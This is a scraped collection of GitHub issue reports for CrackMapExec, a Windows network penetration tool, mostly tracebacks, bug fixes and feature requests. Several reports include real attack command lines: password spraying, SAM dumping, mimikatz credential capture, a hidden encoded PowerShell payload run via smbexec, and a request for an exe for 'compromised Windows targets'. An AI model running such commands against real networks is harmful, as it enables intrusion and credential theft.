  File "/usr/lib/python2.7/dist-packages/pip/req.py", line 1198, in prepare_files
    do_download,
  File "/usr/lib/python2.7/dist-packages/pip/req.py", line 1361, in unpack_url
    unpack_vcs_link(link, loc, only_download)
  File "/usr/lib/python2.7/dist-packages/pip/download.py", line 344, in unpack_vcs_link
    vcs_backend.unpack(location)
  File "/usr/lib/python2.7/dist-packages/pip/vcs/__init__.py", line 240, in unpack
    self.obtain(location)
  File "/usr/lib/python2.7/dist-packages/pip/vcs/git.py", line 111, in obtain
    call_subprocess([self.cmd, 'clone', '-q', url, dest])
  File "/usr/lib/python2.7/dist-packages/pip/util.py", line 716, in call_subprocess
    % (command_desc, proc.returncode, cwd))
InstallationError: Command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build failed with error code 128 in None

Any help would be greatly appreciated.

Some greenlet error

Ran the script with:

./crackmapexec.py -t 25 some-ips.txt -d localhost -u username -p password --execm wmi -X "Import-Module ActiveDirectory; Get-ADGroup"

And just after a few successful login messages but prior to getting any output from the command, this error popped up:

Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, *_self.kwargs)
File "/usr/lib/python2.7/threading.py", line 525, in __bootstrap
self.__bootstrap_inner()
File "/usr/lib/python2.7/threading.py", line 540, in __bootstrap_inner
del _limbo[self]
KeyError: <_Timer(Thread-1, stopped daemon 59241488)>
<Greenlet at 0x387f410: <bound method _Timer.__bootstrap of <_Timer(Thread-1, stopped daemon 59241488)>>> failed with KeyError

Script just plowed on. It happened twice, then when I ran it a third time it went away. I have no idea what's causing so this is probably unhelpful but in case you run into it in the future maybe something here will be useful.

AttributeError: 'int' object has no attribute 'decode'

Originally reported by @maaaaz in #28

I'm also experiencing that bug, which is not directly related to encoding but only type:

$ python crackmapexec_bug.py -d adyolo -u administrator -p "<password>" 192.168.11.136 --sessions
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\administrator:<password>
[+] 192.168.11.136:445 DC01 Current active sessions:
sesi502_cltype_name 
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec_bug.py", line 2926, in connect
    print "{} {}".format(fname, yellow(session[fname]))
  File "crackmapexec_bug.py", line 87, in yellow
    return colored(text.decode('utf8'), 'yellow', attrs=['bold'])
AttributeError: 'int' object has no attribute 'decode'
<Greenlet at 0xb682bb6cL: connect('192.168.11.136')> failed with AttributeError

I was able to fix it by modifying the following line
from:

print "{} {}".format(fname, yellow(session[fname]))

to:

print "{} {}".format(fname, yellow(str(session[fname])))

$ python crackmapexec_bug.py -d adyolo -u administrator -p "<password>" 192.168.11.136 --sessions
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\administrator:<password>
[+] 192.168.11.136:445 DC01 Current active sessions:
sesi502_cltype_name 
sesi502_time 0
sesi502_user_flags 0
sesi502_username administrator
sesi502_idle_time 0
sesi502_num_opens 0
sesi502_cname 192.168.11.130
sesi502_transport 
sesi502_cltype_name 
sesi502_time 0
sesi502_user_flags 0
sesi502_username administrator
sesi502_idle_time 0
sesi502_num_opens 1
sesi502_cname 192.168.11.130
sesi502_transport

By the way has the result presentation changed ? Wasn't it with columns before ?

an other error

11-16-2015 02:22:08 [_] 192.168.193.196:445 is running Windows 6.1 Build 7601 (name:PAVEL-ПК) (domain:PAVEL-ПК)
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, *_self.kwargs)
File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 64, in connect
smb = smart_login(host, smb, domain)
File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/smartlogin.py", line 132, in smart_login
smb.kerberosLogin(user, passwd, domain, '', '', settings.args.aesKey)
File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 270, in kerberosLogin
return self._SMBConnection.kerberosLogin(user, password, domain, lmhash, nthash, aesKey, kdcHost, TGT, TGS)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 526, in kerberosLogin
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, kdcHost)
File "/usr/local/lib/python2.7/dist-packages/impacket/krb5/kerberosv5.py", line 93, in getKerberosTGT
seq_set(reqBody, 'sname', serverName.components_to_asn1)
File "/usr/local/lib/python2.7/dist-packages/impacket/krb5/asn1.py", line 71, in seq_set
seq.setComponentByName(name, builder(component, *args, *_kwargs))
File "/usr/local/lib/python2.7/dist-packages/impacket/krb5/types.py", line 138, in components_to_asn1
strings.setComponentByPosition(i, c)
File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 763, in setComponentByPosition
value = self._componentType.clone(value=value)
File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 328, in clone
value, tagSet, subtypeSpec, encoding, binValue, hexValue
File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 312, in init
base.AbstractSimpleAsn1Item.init(self, value, tagSet, subtypeSpec)
File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/base.py", line 74, in init
value = self.prettyIn(value)
File "/usr/local/lib/python2.7/dist-packages/pyasn1/type/univ.py", line 340, in prettyIn
'Can't encode string '%s' with '%s' codec' % (value, self._encoding)
PyAsn1Error: Can't encode string 'PAVEL-\u041f\u041a' with 'us-ascii' codec
<Greenlet at 0xb496989cL: connect('192.168.193.196')> failed with PyAsn1Error

Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, *_self.kwargs)
File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 56, in connect
smb.logoff()
File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 296, in logoff
return self._SMBConnection.logoff()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 1234, in logoff
ans = self.recvSMB(packetID)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 356, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
raise NetBIOSTimeout
NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
<Greenlet at 0xb652a48cL: connect('192.168.193.35')> failed with NetBIOSTimeout

Windows support

May be an issue or a noob mistake. I have tried to pip install upgrade requirements.tx using command provided but get errors on gevent when I run crackmapexec.py
Traceback (most recent call last):
File "crackmapexec.py", line 4, in
from gevent import monkey
ImportError: No module named gevent

I have also attached the pip.log

C:\Python27\Scripts\pip run on 09/14/15 15:03:37
Downloading/unpacking cython
Getting page https://pypi.python.org/simple/cython/
URLs to search for versions for cython:

operable program or batch file.

Running 'make ' in c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent

Traceback (most recent call last):

File "", line 1, in

File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 408, in 

run_setup(ext_modules, run_make=run_make)

File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 366, in run_setup

make()

File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 232, in make

system('make ' + targets)

File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 142, in system

if _system(cmd):

File "c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent\setup.py", line 138, in _system

return check_call(cmd, shell=True)

File "C:\Python27\lib\subprocess.py", line 540, in check_call

raise CalledProcessError(retcode, cmd)

subprocess.CalledProcessError: Command 'make ' returned non-zero exit status 1

Cleaning up...
Removing temporary dir c:\users\pathName_ad1\appdata\local\temp\pip_build_JC...
Command C:\Python27\python.exe -c "import setuptools, tokenize;file='c:\users\pathName_ad1\appdata\local\temp\pip_build_JC\gevent\setup.py';exec(compile(getattr(tokenize, 'open', open)(file).read().replace('\r\n', '\n'), file, 'exec'))" install --record c:\users\pathName_ad1\appdata\local\temp\pip-rv0hz9-record\install-record.txt --single-version-externally-managed --compile failed with error code 1 in c:\users\pathName_ad1\appdata\local\temp\pip_build_JC\gevent
Exception information:
Traceback (most recent call last):
File "C:\Python27\lib\site-packages\pip\basecommand.py", line 122, in main
status = self.run(options, args)
File "C:\Python27\lib\site-packages\pip\commands\install.py", line 283, in run
requirement_set.install(install_options, global_options, root=options.root_path)
File "C:\Python27\lib\site-packages\pip\req.py", line 1435, in install
requirement.install(install_options, global_options, _args, *_kwargs)
File "C:\Python27\lib\site-packages\pip\req.py", line 706, in install
cwd=self.source_dir, filter_stdout=self._filter_install, show_stdout=False)
File "C:\Python27\lib\site-packages\pip\util.py", line 697, in call_subprocess
% (command_desc, proc.returncode, cwd))
InstallationError: Command C:\Python27\python.exe -c "import setuptools, tokenize;file='c:\users\pathName_ad1\appdata\local\temp\pip_build_JC\gevent\setup.py';exec(compile(getattr(tokenize, 'open', open)(file).read().replace('\r\n', '\n'), file, 'exec'))" install --record c:\users\pathName_ad1\appdata\local\temp\pip-rv0hz9-record\install-record.txt --single-version-externally-managed --compile failed with error code 1 in c:\users\pathName_ad~1\appdata\local\temp\pip_build_JC\gevent

Any thoughts?

SessionError: SMB SessionError: STATUS_NETWORK_NAME_DELETED 

root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec# python crackmapexec.py -t 100 192.168.200.0-255
[*] 192.168.200.44:445 is running Windows 6.3 Build 9600 (name:ISIDORO) (domain:ISIDORO)
[*] 192.168.200.68:445 is running Windows 10.0 Build 10240 (name:LS--20150801JUS) (domain:LS--20150801JUS)
[*] 192.168.200.100:445 is running  (name:NAVEEN-UBUNTU) (domain:NAVEEN-UBUNTU)
[*] 192.168.200.85:445 is running Windows 6.1 Build 7601 (name:АМИР-ПК) (domain:АМИР-ПК)
[*] 192.168.200.33:445 is running Windows 6.1 Build 7601 (name:ДЖОКА-ПК) (domain:ДЖОКА-ПК)
[*] 192.168.200.74:445 is running Windows 6.1 Build 7601 (name:USER-PC) (domain:USER-PC)
[*] 192.168.200.10:445 is running Windows 6.1 Build 7601 (name:АЛЕКСАНДР-ПК) (domain:АЛЕКСАНДР-ПК)
[*] 192.168.200.150:445 is running Windows 6.1 Build 7601 (name:ASUS-PC) (domain:ASUS-PC)
[*] 192.168.200.205:445 is running Windows 10.0 Build 10240 (name:VAIO-STIN) (domain:VAIO-STIN)
[*] 192.168.200.193:445 is running Windows 10.0 Build 10240 (name:MSI) (domain:MSI)
[*] 192.168.200.158:445 is running Windows 6.3 Build 9600 (name:HOME_PC) (domain:HOME_PC)
[*] 192.168.200.214:445 is running Windows 6.1 Build 7601 (name:JAMES-PC) (domain:JAMES-PC)
[*] 192.168.200.227:445 is running Windows 6.3 Build 9600 (name:ASUS) (domain:ASUS)
[*] 192.168.200.191:445 is running Windows 10.0 Build 10240 (name:1-VAIO) (domain:1-VAIO)
[*] 192.168.200.241:445 is running Windows 6.1 Build 7601 (name:HI-TECH-PC) (domain:HI-TECH-PC)
[*] 192.168.200.207:445 is running Windows 10.0 Build 10240 (name:KPANGNY) (domain:KPANGNY)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2906, in connect
    smb = SMBConnection(host, host, None, args.port)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 61, in __init__
    self.negotiateSession(preferredDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 81, in negotiateSession
    self._SMBConnection = smb3.SMB3(self._remoteName, self._remoteHost, self._myName, hostType, self._sess_port, self._timeout, session = self._nmbSession )
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 231, in __init__
    self.negotiateSession(preferredDialect)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 434, in negotiateSession
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3structs.py", line 430, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
SessionError: SMB SessionError: STATUS_NETWORK_NAME_DELETED(The network name was deleted.)
<Greenlet at 0xb65934dcL: connect('192.168.200.40')> failed with SessionError

[*] 192.168.200.0:445 is running Windows 6.3 Build 9600 (name:ALINA) (domain:ALINA)
[*] 192.168.200.6:445 is running Windows 6.3 Build 9600 (name:STUDENT) (domain:STUDENT)
^CKeyboardInterrupt
[*] Got CTRL-C! Exiting..
root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec#

Add an option to see successful actions only

Hello @byt3bl33d3r,

In the same way as the VERBOSE true|false option in msf, could you add an option to see only successful actions (bruteforcing users, listing stuff etc.) that is to say, hide [-] lines for clearer result reporting :)

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p passwords.txt
11-29-2015 14:26:23 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:26:23 [-] 192.168.11.136:445 ADYOLO\user1:yolo SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
11-29-2015 14:26:23 [-] 192.168.11.136:445 ADYOLO\user1:swag SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
11-29-2015 14:26:23 [-] 192.168.11.136:445 ADYOLO\user1:test123! SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
11-29-2015 14:26:23 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!

Cheers.

error 

Traceback (most recent call last):
  File "/Library/Python/2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 1766, in connect
    smb.login('' , '')
<<redacted>>
<Greenlet at 0x1047b1190: connect('<<x.x.x.x>>')> failed with error

needs to handle the exception may be ?

Domain admin successful execution on PC but with NameError thrown

python crackmapexec.py -t 8 -u USERNAME -p PASSW -d DOMAIN --execm smbexec -x 'powershell.exe -nop -nonl -W Hidden -Enc JAB3AGMAPQBOAGUAdwAtAE8AQgBqAEUAQwBUACAAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFcAZQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAAOwAgAHIAdgA6ADEAMQAu... ... etc.' 1.2.3.4

[_] 1.2.3.4:445 is running Windows 6.1 Build 7601 (name: PC) (domain: DOMAIN)
[+] 1.2.3.4:445 Login successful DOMAIN\USERNAME:PASSW
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, **self.kwargs)
File "crackmapexec.py", line 3118, in connect
result = executer.run(host)
File "crackmapexec.py", line 2259, in run
smb_server = SMBServer()
NameError: global name 'SMBServer' is not defined
<Greenlet at 0x7f496f0c6cd0: connect('1.2.3.4')> failed with NameError

** FYI the IP (1.2.3.4 in example above) had both netbios and dns name defined.

commit is 9d15d52

Still some encoding issues

@byt3bl33d3r,

It seems that utf-8 is pretty well handled throught the code, except for parameters passed on the command line (login/password, share name stuff etc.):

  • In the following example I do have a valid french àlolé user :) :
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u àlolé -p yoloswag1!
11-29-2015 14:42:54 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/maingreenlet.py", line 65, in connect
    smb = smart_login(host, smb, domain)
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/smartlogin.py", line 173, in smart_login
    print_succ(u"{}:{} Login successful {}\\{}:{}".format(host, settings.args.port, domain, user, passwd))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: ordinal not in range(128)
<Greenlet at 0xb6820accL: connect('192.168.11.136')> failed with UnicodeDecodeError
  • In the following example I try to list the valid àéyoloshare share:
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u administrator -p test123! --shares --list àéyoloshare
11-29-2015 14:48:24 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:48:24 [+] 192.168.11.136:445 Login successful ADYOLO\administrator:test123!
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/maingreenlet.py", line 78, in connect
    rfs.list()
  File "/mnt/hgfs/Partage/CrackMapExec_fork/core/remotefilesystem.py", line 71, in list
    dir_list = self.__smbconnection.listPath(settings.args.share, path)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 347, in listPath
    return self._SMBConnection.list_path(shareName, path, password)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/smb3.py", line 1372, in listPath
    fileId = self.create(treeId, ntpath.dirname(path), FILE_READ_ATTRIBUTES | FILE_READ_DATA ,FILE_SHARE_READ | FILE_SHARE_WRITE |FILE_SHARE_DELETE, FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, FILE_OPEN, 0)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/smb3.py", line 915, in create
    smb2Create['Buffer']               = fileName.encode('utf-16le')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: ordinal not in range(128)
<Greenlet at 0xb6807accL: connect('192.168.11.136')> failed with UnicodeDecodeError

For the first bug I managed to fix it with user.decode('utf-8') so I guess you would need to UTF-8 decode each passed argument:

print_succ(u"{}:{} Login successful {}\\{}:{}".format(host, settings.args.port, domain, user.decode('utf-8'), passwd))

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u àlolé -p yoloswag1!
11-29-2015 14:59:17 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:59:17 [+] 192.168.11.136:445 Login successful ADYOLO\àlolé:yoloswag1!

The encoding pain is surely close to its end.

EDIT: following that link, maybe that simple fix should be OK:

parser.add_argument("-u", metavar="USERNAME", dest='user', type=lambda s: unicode(s, 'utf8'), default=None, help="Username(s) or file containing usernames")

EDIT2: the error disappear but now a wrong username value is passed to the connection and fails. So UTF-8 decoding should only be done for printing.

Cheers.

Content spidering does not work

Hello @byt3bl33d3r,

I'm trying to use, unsuccessfully, the content spidering feature.
I do have a credz.txt file in the encoding2 folder in the share named share.
The file tree hence looks like this:

C:\SHARE
\---encoding2
    |   credz.txt

The credz.txt file contains:

login:toto
password:titi

Trying the following command does not find the pattern:

$ python crackmapexec_bug.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.133 -s share --spider encoding2 --content --pattern login
[*] 192.168.11.133:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.133:445 Login successful adyolo\user1:yoloswag1!
[*] 192.168.11.133:445 DC01 Started spidering
[*] 192.168.11.133:445 DC01 Done spidering (Completed in 0.0693302154541)

What am I doing wrong ? :)

Cheers.

Create the logs folder if it does not exist

Hello @byt3bl33d3r,

Currently the script crashes if the logs folder does not exist: would you mind to create it (os.makedirs()) if it can't be found ?

$ crackmapexec.exe 192.168.11.129
Traceback (most recent call last):
  File "<string>", line 169, in <module>
  File "core\logger.py", line 27, in setup_logger
  File "C:\Python27\lib\logging\__init__.py", line 911, in __init__
    StreamHandler.__init__(self, self._open())
  File "C:\Python27\lib\logging\__init__.py", line 941, in _open
    stream = open(self.baseFilename, self.mode)
IOError: [Errno 2] No such file or directory: '\\logs\\192.168.11.129_2015-11-27.log'
crackmapexec returned -1

Cheers.

ImportError: cannot import name drsuapi

Have the following problem in kalii linux 2.0

~/CrackMapExec# python crackmapexec.py --help
Traceback (most recent call last):
File "crackmapexec.py", line 15, in
from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst
ImportError: cannot import name drsuapi

Windows support

I haven't tested all functionality, but some minor changes enable this to work with Mimikatz on Windows:

263: log_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
264:+ if sys.platform == 'win32':
265:+ log_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%+m-%d_%H%M%S"))

And also:
3102:- if os.geteuid() is not 0:
3102:+ if sys.platform != 'win32':
3103:+ if os.geteuid() is not 0:

h

h

Handling rpc_s_access_denied exception

Hello @byt3bl33d3r,

It seems that the rpc_s_access_denied exception, often occuring when a user does not have the required privileges or that the target smb share is not under Windows but Unix (might happen during an internal pentest with a lot of unsorted targets), is not correctly handled and crashes the whole processing.
The following example shows a user trying to dump SAM dbs whilst not having the administrative privileges:

$ python crackmapexec_bug.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.136 --sam
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\user1:yoloswag1!
Traceback (most recent call last):
  File "crackmapexec_bug.py", line 1644, in dump
    self.__remoteOps.enableRegistry()
  File "crackmapexec_bug.py", line 795, in enableRegistry
    self.__checkServiceStatus()
  File "crackmapexec_bug.py", line 764, in __checkServiceStatus
    ans = scmr.hROpenSCManagerW(self.__scmr)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/dcerpc/v5/scmr.py", line 1320, in hROpenSCManagerW
    return dce.request(openSCManager)
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/impacket/dcerpc/v5/rpcrt.py", line 859, in request
    raise exception
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

It would be cool to better handle it and basically pass to the next target.

Cheers.

from impacket.smbconnection import SMBConnection, SessionError

⚡ root@backbox  /home/its_0x08/Desktop/exploits/CrackMapExec   master  python crackmapexec.py
Traceback (most recent call last):
File "crackmapexec.py", line 11, in
from core.maingreenlet import connect
File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 4, in
from impacket.smbconnection import SMBConnection, SessionError
ImportError: cannot import name SessionError
✘ ⚡ root@backbox  ~its_0x08/Desktop/exploits/CrackMapExec   master  pip install --upgrade -r requirements.txt
Collecting git+git://github.com/CoreSecurity/impacket (from -r requirements.txt (line 1))
Cloning git://github.com/CoreSecurity/impacket to /tmp/pip-Ud3Plf-build
Requirement already up-to-date: gevent in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2))
Requirement already up-to-date: netaddr in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 3))
Requirement already up-to-date: pycrypto in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 4))
Requirement already up-to-date: pyasn1 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 5))
Requirement already up-to-date: termcolor in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 6))
Requirement already up-to-date: colorama in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 7))
Requirement already up-to-date: greenlet>=0.4.7 in /usr/local/lib/python2.7/dist-packages (from gevent->-r requirements.txt (line 2))
Installing collected packages: impacket
Found existing installation: impacket 0.9.14.dev0
Uninstalling impacket-0.9.14.dev0:
Successfully uninstalled impacket-0.9.14.dev0
Running setup.py install for impacket
Successfully installed impacket-0.9.14.dev0
⚡ root@backbox  ~its_0x08/Desktop/exploits/CrackMapExec   master  python crackmapexec.py
Traceback (most recent call last):
File "crackmapexec.py", line 11, in
from core.maingreenlet import connect
File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 4, in
from impacket.smbconnection import SMBConnection, SessionError
ImportError: cannot import name SessionError
✘ ⚡ root@backbox  ~its_0x08/Desktop/exploits/CrackMapExec   master 

Building a standalone exe version

Hello there,

It would be nice that whether you could bundle your tool in an all-in-one executable, in order to be able to easily deploy it on compromised Windows targets (for pivoting purposes etc.).

Have a look at the bottom of the README of patator to see some tricks for bundling it!

Cheers.

mimikatz output 'None' in user, password and domain

after the last update i got this kind of output:
[+] 192.168.7.13 Found plain text creds! Domain: None Username: None Password: None

The line that print the above string is:
print_succ('{} Found plain text creds! Domain: {} Username: {} Password: {}'.format(self.client_address[0], yellow(domain), yellow(user), yellow(passw)))

yellow() function has return value missed...
adding the return value in the function has worked for me:

def yellow(text):
try:
return colored(text.decode('utf8'), 'yellow', attrs=['bold'])
except UnicodeDecodeError:
colored(unicode(text, errors='ignore'), 'yellow', attrs=['bold'])

Accept Net-Bios names, hostnames, FQDNs as targets

Hello @byt3bl33d3r,

Could you adapt the script in order for it to accept valid domain names instead of only IP addresses ?

(venvcrackmapexec)root@kali:~/CrackMapExec# python crackmapexec.py -t 2 localhost
Traceback (most recent call last):
  File "crackmapexec.py", line 3129, in <module>
    hosts = IPNetwork(args.target[0])
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/netaddr/ip/__init__.py", line 933, in __init__
    raise AddrFormatError('invalid IPNetwork %s' % addr)
netaddr.core.AddrFormatError: invalid IPNetwork localhost

(venvcrackmapexec)root@kali:~/CrackMapExec# python crackmapexec.py -t 2 google.fr
Traceback (most recent call last):
  File "crackmapexec.py", line 3129, in <module>
    hosts = IPNetwork(args.target[0])
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/netaddr/ip/__init__.py", line 933, in __init__
    raise AddrFormatError('invalid IPNetwork %s' % addr)
netaddr.core.AddrFormatError: invalid IPNetwork google.fr

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.